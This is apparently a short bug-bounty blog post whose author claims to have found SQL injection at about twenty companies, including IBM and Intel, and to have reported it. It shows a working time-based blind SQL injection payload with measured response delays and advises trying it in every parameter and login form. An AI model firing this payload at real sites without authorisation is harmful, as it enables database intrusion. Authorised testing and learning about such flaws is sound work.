How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company

How I Found Sql Injection on 8x8 , Cengage ,Comodo ,Automattic ,intel ,IBM ,MTN Group ,uis.cam.ac.uk ,volvocars.biz ,asus.com

What is SQL injection (SQLi)?

I will show you my method to find SQL injection in one photo I hacked all this company in this way and reported in hacker and by email to the company
it’s easy to find SQL injection on the website just we need (burp) to test on the website now see these photos

whit is this command ? why we use this ?

if you add sleep(12) the response time needs 12 seconds to browse the webpage and if you add sleep(20) the browser and the burp response after 20-second show you response and page

  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.508
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.543
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.523
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.565
  • 0"XOR(if(now()=sysdate(),sleep(3),0))XOR”Z => 3.518
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.502
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.491
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.508
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.695

I use this schedule to find SQL injection and I hacked 20 company from this methods

and another way to find SQL injection put this command in all parameters and login forms

I’m here

lu3ky13 is on @buymeacoffee! 🎉

You can support by buying a coffee ☕️ here —
https://www.buymeacoffee.com/lu3ky13

https://hackerone.com/lu3ky-13

https://twitter.com/lu3ky13

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store